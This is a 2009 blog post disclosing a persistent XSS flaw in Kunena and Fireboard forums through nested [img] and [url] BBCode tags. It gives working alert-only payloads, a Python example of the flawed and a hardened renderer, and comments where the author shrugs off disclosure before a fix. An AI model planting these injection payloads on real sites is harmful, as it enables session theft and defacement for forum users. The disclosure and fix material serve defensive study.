Monday, 06 July 2009 15:06

Here's a rather nasty persistent XSS vulnerability I found today in Kunena Forums. Using nested [img] tags, it is possible to inject script into the forums.

Here are some important highlights about this vulnerability:

  • brackets, braces, spaces, and quotes cannot be used in payload
  • BBCode must be enabled
  • you probably have to have an account (as on most forums)
  • img url should be a known bad image, to trigger onerror event
  • there MUST be a space between the second opening [img] tag and the onerror

Without further ado, here's the (rather short) code:

[img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]

UPDATE: This XSS works in the signature field as well as the post message.

UPDATE 2: Nested [url] tags are similarly vulnerable, but they require user interaction to execute, and the payload needs a trailing double slash so the JS engine does not trip over the dangling quote.

[url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]

UPDATE 3: Kunena is a Joomla 1.5 implementation of Fireboard. As it turns out, Fireboard is also vulnerable to this attack vector.
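To show why a nested tag ends up inside the attribute and what a fixed renderer looks like, here is an added Python example (not Kunena's or Fireboard's code): a deliberately simplified renderer that drops each tag body into src unvalidated and re-runs its regex from the innermost tag outward, next to one that validates the URL against a strict character allowlist, HTML-escapes everything and never re-parses its own output. The regexes, the tag handling and the sample inputs are assumptions constructed for this illustration.

```python
import html
import re

# Constructed model of the flaw, not the forum's actual code: a renderer that
# substitutes each [img] body into src unvalidated and reruns the regex until
# nothing changes, so an inner tag's output is re-read as part of the outer one.
NAIVE_IMG = re.compile(r"\[img\]([^\[\]]*)\[/img\]", re.IGNORECASE)

def render_naive(text: str) -> str:
    prev = None
    while prev != text:
        prev, text = text, NAIVE_IMG.sub(r'<img src="\1">', text)
    return text

# Hardened renderer: single pass, explicit allowlist of URL characters (no
# whitespace, quotes, square brackets or angle brackets), HTML escaping of the
# attribute value and of all surrounding text, and no re-parsing of output.
SAFE_URL = re.compile(r"^https?://[A-Za-z0-9._~:/?#@!$&*+,;=%-]+$")
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)

def render_safe(text: str) -> str:
    out, pos = [], 0
    for m in IMG_TAG.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        url = m.group(1).strip()
        if SAFE_URL.match(url):
            out.append('<img src="%s" alt="">' % html.escape(url, quote=True))
        else:
            # Body is not a plain URL (nested tag, spaces, quotes...): emit the
            # raw BBCode as escaped text instead of guessing at markup.
            out.append(html.escape(m.group(0)))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)

# The post's nested-[img] payload, used here only as test input.
PAYLOAD = ("[img]http://foo.com/fake.png [img] onerror=javascript:"
           "alert(String.fromCharCode(88,83,83)) [/img] [/img]")

if __name__ == "__main__":
    print("naive:", render_naive(PAYLOAD))
    print("safe: ", render_safe(PAYLOAD))
```

Run stand-alone, the naive renderer emits an img tag whose src is cut short by the inner output so that onerror becomes a live attribute, while the hardened renderer returns the whole string as inert text.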

Last Updated on Monday, 06 July 2009 22:15
 
Comments (2)
1 Wednesday, 08 July 2009 03:30
Matias
Next time, please give developers some time to fix vulnerabilities before publishing it.

Fix can be found at:
http://www.kunena.com/forum/77-general-talk-about-kunena/22636-persistent-xss#22803
2 Wednesday, 08 July 2009 23:43
Jeff Channell
The resulting chaos can be fun to watch sometimes.

Besides, this is a trick akin to http://secunia.com/advisories/32225 that has been public for 8 months.
